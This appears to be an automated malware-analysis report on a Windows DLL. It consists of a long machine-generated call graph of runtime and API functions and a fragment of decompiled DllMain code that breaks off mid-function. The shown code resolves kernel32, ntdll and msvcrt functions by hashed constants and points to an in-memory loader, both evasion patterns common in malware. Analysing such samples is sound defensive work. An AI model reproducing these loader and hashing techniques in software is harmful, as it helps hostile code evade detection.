16309->16312 16310->16156 16311->16312 16564 1001520e 16312->16564 16314 10015375 FlsSetValue 16314->16310 16316 10013abc 16315->16316 16316->16207 16316->16211 16318 10011e9f ___free_lc_time 16317->16318 16319 10013a38 __lock 34 API calls 16318->16319 16320 10011ea6 16319->16320 16321 10011eb7 GetCurrentProcess TerminateProcess 16320->16321 16322 10011ec7 __lock 16320->16322 16321->16322 16329 10011f42 16322->16329 16325 10011f50 ___free_lc_time 16325->16214 16326 10011f2f 16333 10011dcf GetModuleHandleA 16326->16333 16330 10011f47 16329->16330 16331 10011f2a 16329->16331 16337 10013983 LeaveCriticalSection 16330->16337 16331->16325 16331->16326 16334 10011df4 ExitProcess 16333->16334 16335 10011dde GetProcAddress 16333->16335 16335->16334 16336 10011dee 16335->16336 16336->16334 16337->16331 16340 100138ee 16338->16340 16339 10019599 __lock 2 API calls 16339->16340 16340->16339 16341 1001391c 16340->16341 16341->16226 16341->16227 16343 10012d8b 16342->16343 16344 10012d92 16342->16344 16346 10012c32 16343->16346 16344->16286 16347 10012c3e ___free_lc_time 16346->16347 16348 10013a38 __lock 36 API calls 16347->16348 16349 10012c49 16348->16349 16350 10012c5d GetOEMCP 16349->16350 16351 10012c6f 16349->16351 16354 10012c86 16350->16354 16352 10012c74 GetACP 16351->16352 16351->16354 16352->16354 16353 10012d61 16370 10012d79 16353->16370 16354->16353 16355 10012cc4 16354->16355 16356 100107b6 __getbuf 36 API calls 16354->16356 16361 10012cd6 16355->16361 16362 10012aa2 16355->16362 16356->16355 16358 10012d70 ___free_lc_time 16358->16344 16360 100107c8 ___free_lc_time 36 API calls 16360->16353 16361->16353 16361->16360 16363 10012ac0 16362->16363 16369 10012aeb ___initmbctable 16362->16369 16364 10012ad7 GetCPInfo 16363->16364 16363->16369 16364->16369 16366 10012c1e 16367 100117ae __lock 36 API calls 16366->16367 16368 10012c30 16367->16368 16368->16361 16369->16366 16373 100128a7 GetCPInfo 16369->16373 16501 10013983 LeaveCriticalSection 16370->16501 16372 
10012d80 16372->16358 16374 100128d7 16373->16374 16382 10012999 16373->16382 16383 1001843d 16374->16383 16376 1001294d 16406 10018081 16376->16406 16377 100117ae __lock 36 API calls 16379 10012a31 16377->16379 16379->16366 16380 10012971 16381 10018081 ___initmbctable 61 API calls 16380->16381 16381->16382 16382->16377 16384 10018449 ___free_lc_time 16383->16384 16385 10018453 GetStringTypeW 16384->16385 16386 1001846b 16384->16386 16385->16386 16388 10018473 GetLastError 16385->16388 16387 10018580 16386->16387 16389 1001849e 16386->16389 16450 1001a444 GetLocaleInfoA 16387->16450 16388->16386 16390 100184ba MultiByteToWideChar 16389->16390 16394 1001857a ___free_lc_time 16389->16394 16392 100184e8 __lock ___initmbctable 16390->16392 16390->16394 16400 10018546 MultiByteToWideChar 16392->16400 16403 1001382a __lock 36 API calls 16392->16403 16394->16376 16395 100185cc GetStringTypeA 16395->16394 16397 100185e5 16395->16397 16398 100107c8 ___free_lc_time 36 API calls 16397->16398 16398->16394 16399 100185c0 16399->16394 16399->16395 16401 1001855d GetStringTypeW 16400->16401 16402 1001856e 16400->16402 16401->16402 16402->16394 16405 100107c8 ___free_lc_time 36 API calls 16402->16405 16404 10018537 16403->16404 16404->16394 16404->16400 16405->16394 16407 1001808d ___free_lc_time 16406->16407 16408 10018097 LCMapStringW 16407->16408 16411 100180b2 16407->16411 16409 100180ba GetLastError 16408->16409 16408->16411 16409->16411 16410 100182d9 16413 1001a444 ___initmbctable 50 API calls 16410->16413 16411->16410 16412 10018105 16411->16412 16414 10018126 MultiByteToWideChar 16412->16414 16416 100182d1 ___free_lc_time 16412->16416 16415 10018303 16413->16415 16414->16416 16419 10018154 __lock 16414->16419 16415->16416 16417 1001840a LCMapStringA 16415->16417 16418 1001831c 16415->16418 16416->16380 16438 10018407 16417->16438 16420 1001a487 ___initmbctable 43 API calls 16418->16420 16421 100181b3 MultiByteToWideChar 16419->16421 16423 100107b6 __getbuf 36 API calls 
16419->16423 16422 1001832e 16420->16422 16424 100181d0 LCMapStringW 16421->16424 16425 100182b6 16421->16425 16422->16416 16427 10018338 LCMapStringA 16422->16427 16429 100181a0 16423->16429 16424->16425 16430 100181ef 16424->16430 16431 100182c3 16425->16431 16434 100107c8 ___free_lc_time 36 API calls 16425->16434 16426 100107c8 ___free_lc_time 36 API calls 16426->16416 16428 10018357 __lock ___initmbctable 16427->16428 16445 100183d2 16427->16445 16442 100183b5 LCMapStringA 16428->16442 16444 100107b6 __getbuf 36 API calls 16428->16444 16429->16416 16429->16421 16432 10018222 __lock 16430->16432 16433 100181f5 16430->16433 16431->16416 16435 100107c8 ___free_lc_time 36 API calls 16431->16435 16439 1001827d LCMapStringW 16432->16439 16440 100107b6 __getbuf 36 API calls 16432->16440 16433->16425 16437 10018207 LCMapStringW 16433->16437 16434->16431 16435->16416 16436 100107c8 ___free_lc_time 36 API calls 16436->16438 16437->16425 16438->16416 16438->16426 16439->16425 16441 10018295 WideCharToMultiByte 16439->16441 16443 1001826e 16440->16443 16441->16425 16442->16445 16446 100183d6 16442->16446 16443->16425 16443->16439 16449 1001839a ___initmbctable 16444->16449 16445->16436 16445->16438 16448 1001a487 ___initmbctable 43 API calls 16446->16448 16448->16445 16449->16442 16449->16445 16451 1001a473 16450->16451 16452 1001a46e 16450->16452 16482 10012749 16451->16482 16454 100117ae __lock 36 API calls 16452->16454 16455 100185a0 16454->16455 16455->16394 16455->16395 16456 1001a487 16455->16456 16457 1001a493 ___free_lc_time 16456->16457 16458 1001a4ba GetCPInfo 16457->16458 16460 1001a5ca 16457->16460 16459 1001a4cb 16458->16459 16464 1001a4de _strlen 16458->16464 16462 1001a4d1 GetCPInfo 16459->16462 16459->16464 16461 1001a584 16460->16461 16463 100107c8 ___free_lc_time 36 API calls 16460->16463 16466 100117ae __lock 36 API calls 16461->16466 16462->16464 16463->16461 16465 1001a512 MultiByteToWideChar 16464->16465 16469 1001a52c __lock ___initmbctable 
16464->16469 16465->16461 16465->16469 16467 1001a64a ___free_lc_time 16466->16467 16467->16399 16468 1001a592 MultiByteToWideChar 16468->16460 16471 1001a5ad 16468->16471 16469->16468 16470 1001382a __lock 36 API calls 16469->16470 16472 1001a57c 16470->16472 16473 1001a5d2 16471->16473 16474 1001a5b2 WideCharToMultiByte 16471->16474 16472->16461 16472->16468 16475 1001a5d7 WideCharToMultiByte 16473->16475 16476 1001a5ed 16473->16476 16474->16460 16475->16460 16475->16476 16477 1001382a __lock 36 API calls 16476->16477 16478 1001a5f5 16477->16478 16478->16460 16479 1001a5fe WideCharToMultiByte 16478->16479 16479->16460 16480 1001a612 16479->16480 16481 100107c8 ___free_lc_time 36 API calls 16480->16481 16481->16460 16483 1001519d __lock 36 API calls 16482->16483 16484 10012750 16483->16484 16487 10012760 16484->16487 16489 10018046 16484->16489 16488 1001278e 16487->16488 16497 10017e3e 16487->16497 16488->16452 16490 10018052 ___free_lc_time 16489->16490 16491 10013a38 __lock 36 API calls 16490->16491 16492 10018059 16491->16492 16493 10017f85 ___initmbctable 36 API calls 16492->16493 16494 10018063 16493->16494 16495 10018078 ___initmbctable LeaveCriticalSection 16494->16495 16496 1001806f ___free_lc_time 16495->16496 16496->16487 16498 10017e53 16497->16498 16499 10017e5c 16497->16499 16498->16487 16500 1001843d ___initmbctable 50 API calls 16499->16500 16500->16498 16501->16372 16505 10010ffc 16502->16505 16504 1001103d 16504->16307 16506 10011008 ___free_lc_time 16505->16506 16513 10011dff 16506->16513 16512 10011025 ___free_lc_time 16512->16504 16514 10013a38 __lock 36 API calls 16513->16514 16515 1001100d 16514->16515 16516 10010f54 16515->16516 16526 100126d3 16516->16526 16518 10010f60 16522 10010fa2 16518->16522 16534 1001234f 16518->16534 16520 10010f8d 16521 1001234f 39 API calls 16520->16521 16520->16522 16521->16522 16523 1001102e 16522->16523 16560 10011e08 16523->16560 16527 100126df ___free_lc_time 16526->16527 16528 10012722 HeapSize 16527->16528 
16529 10013a38 __lock 36 API calls 16527->16529 16530 10012735 ___free_lc_time 16528->16530 16531 100126ef ___free_lc_time 16529->16531 16530->16518 16552 10012740 16531->16552 16535 1001235b ___free_lc_time 16534->16535 16536 10012372 16535->16536 16537 10012364 16535->16537 16539 10012385 16536->16539 16540 10012379 16536->16540 16538 100107b6 __getbuf 36 API calls 16537->16538 16545 1001236c ___free_lc_time 16538->16545 16544 100124c0 __getbuf 16539->16544 16550 10012392 __getbuf ___sbh_resize_block ___free_lc_time 16539->16550 16541 100107c8 ___free_lc_time 36 API calls 16540->16541 16541->16545 16542 100124ce HeapReAlloc 16542->16544 16543 10013a38 __lock 36 API calls 16543->16550 16544->16542 16544->16545 16545->16520 16547 1001241e HeapAlloc 16547->16550 16548 10012474 HeapReAlloc 16548->16550 16549 1001437a __getbuf 5 API calls 16549->16550 16550->16543 16550->16545 16550->16547 16550->16548 16550->16549 16551 10013bc6 VirtualFree VirtualFree HeapFree ___free_lc_time 16550->16551 16556 100124b7 16550->16556 16551->16550 16555 10013983 LeaveCriticalSection 16552->16555 16554 1001271c 16554->16528 16554->16530 16555->16554 16559 10013983 LeaveCriticalSection 16556->16559 16558 100124be 16558->16550 16559->16558 16563 10013983 LeaveCriticalSection 16560->16563 16562 10011033 16562->16512 16563->16562 16567 1001521a ___free_lc_time 16564->16567 16565 10015332 ___free_lc_time 16565->16314 16566 10015234 16569 10015242 16566->16569 16571 100107c8 ___free_lc_time 36 API calls 16566->16571 16567->16565 16567->16566 16568 100107c8 ___free_lc_time 36 API calls 16567->16568 16568->16566 16570 10015250 16569->16570 16572 100107c8 ___free_lc_time 36 API calls 16569->16572 16573 1001525e 16570->16573 16574 100107c8 ___free_lc_time 36 API calls 16570->16574 16571->16569 16572->16570 16575 1001526c 16573->16575 16576 100107c8 ___free_lc_time 36 API calls 16573->16576 16574->16573 16577 1001527a 16575->16577 16579 100107c8 ___free_lc_time 36 API calls 16575->16579 
16576->16575 16578 1001528b 16577->16578 16580 100107c8 ___free_lc_time 36 API calls 16577->16580 16581 10013a38 __lock 36 API calls 16578->16581 16579->16577 16580->16578 16584 10015293 16581->16584 16582 100152b3 16594 10015340 16582->16594 16584->16582 16587 100107c8 ___free_lc_time 36 API calls 16584->16587 16586 10013a38 __lock 36 API calls 16591 100152c4 16586->16591 16587->16582 16588 10015322 16621 1001534c 16588->16621 16591->16588 16597 10017eb5 16591->16597 16592 100107c8 ___free_lc_time 36 API calls 16592->16565 16624 10013983 LeaveCriticalSection 16594->16624 16596 100152bd 16596->16586 16598 10017f29 16597->16598 16600 10017ec8 16597->16600 16599 10017f52 16598->16599 16602 100107c8 ___free_lc_time 36 API calls 16598->16602 16617 10017f79 16599->16617 16649 1001a17c 16599->16649 16600->16598 16604 10017ef4 16600->16604 16611 100107c8 ___free_lc_time 36 API calls 16600->16611 16601 100107c8 ___free_lc_time 36 API calls 16603 10017f81 16601->16603 16605 10017f44 16602->16605 16603->16588 16612 100107c8 ___free_lc_time 36 API calls 16604->16612 16620 10017f17 16604->16620 16608 100107c8 ___free_lc_time 36 API calls 16605->16608 16606 100107c8 ___free_lc_time 36 API calls 16609 10017f21 16606->16609 16608->16599 16613 100107c8 ___free_lc_time 36 API calls 16609->16613 16615 10017eec 16611->16615 16616 10017f0f 16612->16616 16613->16598 16614 100107c8 ___free_lc_time 36 API calls 16614->16617 16625 1001a36b 16615->16625 16641 1001a30c 16616->16641 16617->16601 16620->16606 16737 10013983 LeaveCriticalSection 16621->16737 16623 1001532c 16623->16592 16624->16596 16626 1001a441 16625->16626 16627 1001a378 16625->16627 16626->16604 16628 1001a394 16627->16628 16631 100107c8 ___free_lc_time 36 API calls 16627->16631 16629 1001a3b1 16628->16629 16633 100107c8 ___free_lc_time 36 API calls 16628->16633 16630 1001a3ce 16629->16630 16634 100107c8 ___free_lc_time 36 API calls 16629->16634 16632 1001a3eb 16630->16632 16637 100107c8 ___free_lc_time 36 API calls 
16630->16637 16631->16628 16635 1001a408 16632->16635 16638 100107c8 ___free_lc_time 36 API calls 16632->16638 16633->16629 16634->16630 16636 1001a425 16635->16636 16639 100107c8 ___free_lc_time 36 API calls 16635->16639 16636->16626 16640 100107c8 ___free_lc_time 36 API calls 16636->16640 16637->16632 16638->16635 16639->16636 16640->16626 16642 1001a315 16641->16642 16643 1001a368 16641->16643 16644 1001a32f 16642->16644 16646 100107c8 ___free_lc_time 36 API calls 16642->16646 16643->16620 16645 1001a34c 16644->16645 16647 100107c8 ___free_lc_time 36 API calls 16644->16647 16645->16643 16648 100107c8 ___free_lc_time 36 API calls 16645->16648 16646->16644 16647->16645 16648->16643 16650 1001a189 16649->16650 16651 10017f71 16649->16651 16652 100107c8 ___free_lc_time 36 API calls 16650->16652 16651->16614 16653 1001a191 16652->16653 16654 100107c8 ___free_lc_time 36 API calls 16653->16654 16655 1001a199 16654->16655 16656 100107c8 ___free_lc_time 36 API calls 16655->16656 16657 1001a1a1 16656->16657 16658 100107c8 ___free_lc_time 36 API calls 16657->16658 16659 1001a1a9 16658->16659 16660 100107c8 ___free_lc_time 36 API calls 16659->16660 16661 1001a1b1 16660->16661 16662 100107c8 ___free_lc_time 36 API calls 16661->16662 16663 1001a1b9 16662->16663 16664 100107c8 ___free_lc_time 36 API calls 16663->16664 16665 1001a1c0 16664->16665 16666 100107c8 ___free_lc_time 36 API calls 16665->16666 16667 1001a1c8 16666->16667 16668 100107c8 ___free_lc_time 36 API calls 16667->16668 16669 1001a1d0 16668->16669 16670 100107c8 ___free_lc_time 36 API calls 16669->16670 16671 1001a1d8 16670->16671 16672 100107c8 ___free_lc_time 36 API calls 16671->16672 16673 1001a1e0 16672->16673 16674 100107c8 ___free_lc_time 36 API calls 16673->16674 16675 1001a1e8 16674->16675 16676 100107c8 ___free_lc_time 36 API calls 16675->16676 16677 1001a1f0 16676->16677 16678 100107c8 ___free_lc_time 36 API calls 16677->16678 16679 1001a1f8 16678->16679 16680 100107c8 ___free_lc_time 36 API calls 
16679->16680 16681 1001a200 16680->16681 16682 100107c8 ___free_lc_time 36 API calls 16681->16682 16683 1001a208 16682->16683 16684 100107c8 ___free_lc_time 36 API calls 16683->16684 16685 1001a213 16684->16685 16686 100107c8 ___free_lc_time 36 API calls 16685->16686 16687 1001a21b 16686->16687 16688 100107c8 ___free_lc_time 36 API calls 16687->16688 16689 1001a223 16688->16689 16690 100107c8 ___free_lc_time 36 API calls 16689->16690 16691 1001a22b 16690->16691 16692 100107c8 ___free_lc_time 36 API calls 16691->16692 16693 1001a233 16692->16693 16694 100107c8 ___free_lc_time 36 API calls 16693->16694 16695 1001a23b 16694->16695 16696 100107c8 ___free_lc_time 36 API calls 16695->16696 16697 1001a243 16696->16697 16698 100107c8 ___free_lc_time 36 API calls 16697->16698 16699 1001a24b 16698->16699 16700 100107c8 ___free_lc_time 36 API calls 16699->16700 16701 1001a253 16700->16701 16702 100107c8 ___free_lc_time 36 API calls 16701->16702 16703 1001a25b 16702->16703 16704 100107c8 ___free_lc_time 36 API calls 16703->16704 16705 1001a263 16704->16705 16706 100107c8 ___free_lc_time 36 API calls 16705->16706 16707 1001a26b 16706->16707 16708 100107c8 ___free_lc_time 36 API calls 16707->16708 16709 1001a273 16708->16709 16710 100107c8 ___free_lc_time 36 API calls 16709->16710 16711 1001a27b 16710->16711 16712 100107c8 ___free_lc_time 36 API calls 16711->16712 16713 1001a283 16712->16713 16714 100107c8 ___free_lc_time 36 API calls 16713->16714 16715 1001a28b 16714->16715 16716 100107c8 ___free_lc_time 36 API calls 16715->16716 16717 1001a299 16716->16717 16718 100107c8 ___free_lc_time 36 API calls 16717->16718 16719 1001a2a4 16718->16719 16720 100107c8 ___free_lc_time 36 API calls 16719->16720 16721 1001a2af 16720->16721 16722 100107c8 ___free_lc_time 36 API calls 16721->16722 16723 1001a2ba 16722->16723 16724 100107c8 ___free_lc_time 36 API calls 16723->16724 16725 1001a2c5 16724->16725 16726 100107c8 ___free_lc_time 36 API calls 16725->16726 16727 1001a2d0 16726->16727 
16728 100107c8 ___free_lc_time 36 API calls 16727->16728 16729 1001a2db 16728->16729 16730 100107c8 ___free_lc_time 36 API calls 16729->16730 16731 1001a2e6 16730->16731 16732 100107c8 ___free_lc_time 36 API calls 16731->16732 16733 1001a2f1 16732->16733 16734 100107c8 ___free_lc_time 36 API calls 16733->16734 16735 1001a2fc 16734->16735 16736 100107c8 ___free_lc_time 36 API calls 16735->16736 16736->16651 16737->16623 16739 100107b6 __getbuf 36 API calls 16738->16739 16740 1000504b 16739->16740 16741 10005052 16740->16741 16742 100107c8 ___free_lc_time 36 API calls 16740->16742 16741->16190 16743 10005077 16742->16743 16743->16190 16745 10005312 16744->16745 16754 1000600e 16744->16754 16746 100056c8 GetNativeSystemInfo 16745->16746 16745->16754 16747 10005753 16746->16747 16748 10005a04 GetProcessHeap HeapAlloc 16747->16748 16747->16754 16749 10005a9d 16748->16749 16750 10005ae8 16748->16750 16749->16203 16751 10005fdb 16750->16751 16753 10005c79 memcpy 16750->16753 16760 1000601b 16751->16760 16797 10004dd0 16751->16797 16776 10002ca0 16753->16776 16754->16203 16756 10005e55 16756->16751 16781 10003f40 16756->16781 16758 10005f8c 16758->16751 16790 10003570 16758->16790 16760->16203 16762 10002453 ??3@YAXPAX 16761->16762 16762->16200 16765 10011141 ___free_lc_time 16764->16765 16810 10016025 16765->16810 16767 1001114e 16815 1001609a 16767->16815 16775 10011182 ___free_lc_time 16775->16193 16777 10003200 16776->16777 16778 10002d9d 16776->16778 16777->16756 16778->16777 16779 10002ed8 memset 16778->16779 16780 100030b3 memcpy 16778->16780 16779->16778 16780->16778 16782 10004001 IsBadReadPtr 16781->16782 16783 10003ff4 16781->16783 16784 100040b7 16782->16784 16785 10004571 16782->16785 16783->16758 16784->16785 16786 1000418e realloc 16784->16786 16788 1000453b IsBadReadPtr 16784->16788 16785->16758 16786->16784 16787 100045a4 16786->16787 16787->16758 16788->16784 16789 10004565 16788->16789 16789->16758 16794 10003644 16790->16794 16791 10003a98 16792 
10003310 VirtualProtect 16791->16792 16793 10003aaf 16792->16793 16793->16751 16794->16791 16796 10003ac0 16794->16796 16805 10003310 16794->16805 16796->16751 16798 10005038 16797->16798 16799 10004dde ??3@YAXPAX 16797->16799 16798->16754 16801 10004fbd GetProcessHeap HeapFree 16799->16801 16804 10004e80 ??3@YAXPAX 16799->16804 16801->16798 16804->16801 16806 10003322 16805->16806 16807 1000332b 16805->16807 16806->16794 16808 10003500 VirtualProtect 16807->16808 16809 1000337a 16807->16809 16808->16794 16809->16794 16811 10016039 EnterCriticalSection 16810->16811 16812 1001602e 16810->16812 16811->16767 16813 10013a38 __lock 36 API calls 16812->16813 16814 10016037 16813->16814 16814->16767 16816 100160a7 _write_multi_char 16815->16816 16817 1001115a 16816->16817 16818 100107b6 __getbuf 36 API calls 16816->16818 16819 1001573f 16817->16819 16818->16817 16820 10015f00 16819->16820 16824 10015776 __aulldvrm _strlen 16819->16824 16821 100117ae __lock 36 API calls 16820->16821 16822 1001116a 16821->16822 16830 10016122 16822->16830 16823 100156b1 46 API calls _write_multi_char 16823->16824 16824->16820 16824->16823 16825 100107b6 __getbuf 36 API calls 16824->16825 16826 10019af2 37 API calls 16824->16826 16827 100107c8 ___free_lc_time 36 API calls 16824->16827 16828 100156e4 46 API calls _write_multi_char 16824->16828 16829 10015708 46 API calls 16824->16829 16825->16824 16826->16824 16827->16824 16828->16824 16829->16824 16831 10016129 16830->16831 16832 10011176 16830->16832 16831->16832 16837 10019bb4 16831->16837 16834 10011190 16832->16834 16937 10016077 16834->16937 16836 10011198 16836->16775 16838 10019bc9 16837->16838 16840 10019be5 16837->16840 16838->16840 16841 10019979 16838->16841 16840->16832 16842 10019985 ___free_lc_time 16841->16842 16843 10019a08 16842->16843 16845 100199b0 16842->16845 16844 100136f5 __lock 36 API calls 16843->16844 16846 10019a0d 16844->16846 16859 1001b0ce 16845->16859 16849 100136fe _write_multi_char 36 API calls 16846->16849 
16848 100199b6 16850 100199c4 16848->16850 16851 100199d8 16848->16851 16852 100199f8 ___free_lc_time 16849->16852 16868 100197ab 16850->16868 16854 100136f5 __lock 36 API calls 16851->16854 16852->16840 16856 100199dd 16854->16856 16855 100199d0 16895 10019a00 16855->16895 16892 100136fe 16856->16892 16860 1001b0da ___free_lc_time 16859->16860 16861 1001b13c EnterCriticalSection 16860->16861 16862 10013a38 __lock 36 API calls 16860->16862 16867 1001b11f __lock ___free_lc_time 16861->16867 16863 1001b102 16862->16863 16864 1001b119 16863->16864 16866 10019599 __lock 2 API calls 16863->16866 16864->16867 16898 1001b165 16864->16898 16866->16864 16867->16848 16869 100197dc 16868->16869 16889 100197d5 16868->16889 16870 10019815 16869->16870 16902 1001b190 16869->16902 16873 100198f3 WriteFile 16870->16873 16879 10019826 16870->16879 16871 100117ae __lock 36 API calls 16876 10019971 16871->16876 16874 100198ba 16873->16874 16875 1001991b GetLastError 16873->16875 16877 10019931 16874->16877 16882 100198d7 16874->16882 16874->16889 16875->16874 16876->16855 16878 100136f5 __lock 36 API calls 16877->16878 16877->16889 16883 1001994e 16878->16883 16879->16874 16879->16877 16880 1001987c WriteFile 16879->16880 16880->16879 16881 100198bc GetLastError 16880->16881 16881->16874 16884 10019926 16882->16884 16885 100198df 16882->16885 16886 100136fe _write_multi_char 36 API calls 16883->16886 16912 10013707 16884->16912 16888 100136f5 __lock 36 API calls 16885->16888 16886->16889 16890 100198e4 16888->16890 16889->16871 16891 100136fe _write_multi_char 36 API calls 16890->16891 16891->16889 16893 1001519d __lock 36 API calls 16892->16893 16894 10013703 16893->16894 16894->16855 16936 1001b16e LeaveCriticalSection 16895->16936 16897 10019a06 16897->16852 16901 10013983 LeaveCriticalSection 16898->16901 16900 1001b16c 16900->16861 16901->16900 16929 1001b08d 16902->16929 16904 1001b1ac 16905 1001b1c1 SetFilePointer 16904->16905 16906 1001b1b4 16904->16906 16908 1001b1d9 
GetLastError 16905->16908 16909 1001b1b9 16905->16909 16907 100136f5 __lock 36 API calls 16906->16907 16907->16909 16908->16909 16910 1001b1e3 16908->16910 16909->16870 16911 10013707 _write_multi_char 36 API calls 16910->16911 16911->16909 16913 1001519d __lock 36 API calls 16912->16913 16914 1001370d 16913->16914 16915 1001373d 16914->16915 16916 10013725 16914->16916 16917 1001519d __lock 36 API calls 16915->16917 16919 1001374e 16916->16919 16921 1001372f 16916->16921 16918 10013742 16917->16918 16918->16889 16920 1001376c 16919->16920 16922 1001375e 16919->16922 16923 1001519d __lock 36 API calls 16920->16923 16924 1001519d __lock 36 API calls 16921->16924 16925 1001519d __lock 36 API calls 16922->16925 16926 10013771 16923->16926 16927 10013734 16924->16927 16928 10013763 16925->16928 16926->16889 16927->16889 16928->16889 16930 1001b099 16929->16930 16931 1001b0b4 16930->16931 16932 100136f5 __lock 36 API calls 16930->16932 16931->16904 16933 1001b0bc 16932->16933 16934 100136fe _write_multi_char 36 API calls 16933->16934 16935 1001b0c7 16934->16935 16935->16904 16936->16897 16938 10016080 16937->16938 16939 1001608b LeaveCriticalSection 16937->16939 16942 10013983 LeaveCriticalSection 16938->16942 16939->16836 16941 10016089 16941->16836 16942->16941 15861 100011a0 15864 100350ea 15861->15864 15863 100011aa 15865 100350f4 __EH_prolog 15864->15865 15874 10035766 15865->15874 15868 1003511a 15882 100373b5 15868->15882 15875 10035770 __EH_prolog 15874->15875 15898 1003570d 15875->15898 15877 10035102 15877->15868 15878 10011f76 15877->15878 15879 10011f7f _strlen 15878->15879 15881 10011f8c __lock 15878->15881 15904 100107b6 15879->15904 15881->15868 15883 10037855 24 API calls 15882->15883 15884 100373c4 15883->15884 15885 10035128 15884->15885 16064 100375b2 15884->16064 15887 10037855 15885->15887 15888 1003785f __EH_prolog 15887->15888 15889 10037884 15888->15889 15894 10037895 15888->15894 16082 1003768d TlsAlloc 15888->16082 16085 10037446 
EnterCriticalSection 15889->16085 15893 100378a4 15895 100378aa 15893->15895 15896 1003513a GetCurrentThread GetCurrentThreadId 15893->15896 16095 10037552 EnterCriticalSection 15894->16095 16100 10037732 EnterCriticalSection 15895->16100 15896->15863 15901 100373a5 15898->15901 15902 10037855 24 API calls 15901->15902 15903 10035724 GetCursorPos 15902->15903 15903->15877 15907 1001078a 15904->15907 15908 100107b3 15907->15908 15910 10010791 __getbuf 15907->15910 15908->15881 15910->15908 15911 1001070f 15910->15911 15913 1001071b ___free_lc_time 15911->15913 15912 1001074e 15914 10010769 RtlAllocateHeap 15912->15914 15916 10010778 ___free_lc_time 15912->15916 15913->15912 15921 10013a38 15913->15921 15914->15916 15916->15910 15917 10010736 15928 1001437a 15917->15928 15922 10013a4b 15921->15922 15923 10013a5e EnterCriticalSection 15921->15923 15937 10013998 15922->15937 15923->15917 15925 10013a51 15925->15923 15958 10011400 15925->15958 15931 100143ac 15928->15931 15929 100144cf 15933 10010741 15929->15933 16059 10013f95 15929->16059 15931->15929 15931->15933 16051 10013ede 15931->16051 15934 10010781 15933->15934 16063 10013983 LeaveCriticalSection 15934->16063 15936 10010788 15936->15912 15938 100139a4 ___free_lc_time 15937->15938 15939 100107b6 __getbuf 36 API calls 15938->15939 15943 100139c7 __lock ___free_lc_time 15938->15943 15940 100139bb 15939->15940 15941 100139c2 15940->15941 15942 100139cf 15940->15942 15964 100136f5 15941->15964 15945 10013a38 __lock 36 API calls 15942->15945 15943->15925 15946 100139d6 15945->15946 15947 10013a16 15946->15947 15948 100139de 15946->15948 15949 100107c8 ___free_lc_time 36 API calls 15947->15949 15967 10019599 15948->15967 15951 10013a12 15949->15951 15982 10013a2f 15951->15982 15952 100139e9 15952->15951 15953 100139ef 15952->15953 15972 100107c8 15953->15972 15956 100139f5 15957 100136f5 __lock 36 API calls 15956->15957 15957->15943 15959 1001140a 15958->15959 15960 1001141c 15959->15960 16013 10016b0b 15959->16013 

                                                                        C-Code - Quality: 41%
                                                                        			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
                                                                        				void* _v4;
                                                                        				void* _t36;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t43;
                                                                        				intOrPtr _t44;
                                                                        				intOrPtr _t45;
                                                                        				intOrPtr _t46;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				intOrPtr _t51;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t53;
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t56;
                                                                        				intOrPtr _t57;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t61;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr _t63;
                                                                        				intOrPtr _t64;
                                                                        				struct HRSRC__* _t65;
                                                                        				signed int _t68;
                                                                        				signed int _t69;
                                                                        				void* _t77;
                                                                        				void* _t79;
                                                                        				intOrPtr _t83;
                                                                        				signed int _t85;
                                                                        				signed int _t96;
                                                                        				void* _t97;
                                                                        				signed int _t99;
                                                                        				signed int _t100;
                                                                        				signed int _t110;
                                                                        				signed int _t112;
                                                                        				signed int _t113;
                                                                        				long _t117;
                                                                        				signed int _t119;
                                                                        				void* _t121;
                                                                        				struct HRSRC__* _t123;
                                                                        				int _t124;
                                                                        				void* _t127;
                                                                        				struct HINSTANCE__* _t128;
                                                                        				signed int _t129;
                                                                        				void* _t133;
                                                                        				signed int _t138;
                                                                        				signed int _t149;
                                                                        				signed int _t152;
                                                                        				signed int _t157;
                                                                        				intOrPtr _t182;
                                                                        
                                                                        				if(_a8 != 1) {
                                                                        					L6:
                                                                        					return 1;
                                                                        				} else {
                                                                        					_t36 = E10005040(__edi);
                                                                        					_t181 = _t36;
                                                                        					if(_t36 != 0) {
                                                                        						_push(0x1003ce28);
                                                                        						E10011135(__ebx, __edi, __esi, __eflags);
                                                                        						__eflags = 0;
                                                                        						return 0;
                                                                        					} else {
                                                                        						_push(__ebx);
                                                                        						_push(__ebp);
                                                                        						_push(__esi);
                                                                        						_push(__edi);
                                                                        						_push(L"kernel32.dll");
                                                                        						_push(0x3801a8f2);
                                                                        						_push(0x1a322e2e);
                                                                        						_push(0x628ad09);
                                                                        						_push(0x31c6c0a1);
                                                                        						_push(0x28b4cee6);
                                                                        						 *0x1004b0d8 = 0;
                                                                        						 *0x1004b0dc = 0;
                                                                        						 *0x1004b0e0 = 0;
                                                                        						 *0x1004b0e8 = 0;
                                                                        						 *0x1004b0e4 = 0;
                                                                        						 *0x1004b0ec = 0;
                                                                        						 *0x1004b0f0 = 0;
                                                                        						_t39 = E10001E60(_t181);
                                                                        						_push(L"ntdll.dll");
                                                                        						_push(0x1c9cdc39);
                                                                        						_push(0x2d34cc91);
                                                                        						_push(0x118db97f);
                                                                        						_push(0x348b2998);
                                                                        						_push(0x3446e98c);
                                                                        						_t127 = _t39;
                                                                        						_t40 = E10001E60(_t181);
                                                                        						_push(L"msvcrt.dll");
                                                                        						_push(0xe094f82);
                                                                        						_push(0x20e23fe3);
                                                                        						_push(0x156af904);
                                                                        						_push(0x108d4cdc);
                                                                        						_push(0x106d66fc);
                                                                        						_t121 = E10001E60(_t181);
                                                                        						_push(0x3ee42795);
                                                                        						_push(_t121);
                                                                        						_t42 = E10001FF0();
                                                                        						_push(0x402c2791);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3f0 = _t42;
                                                                        						_t43 = E10001FF0();
                                                                        						_push(0xb29018f0);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3ec = _t43;
                                                                        						_t44 = E10001FF0();
                                                                        						_push(0xccfd283f);
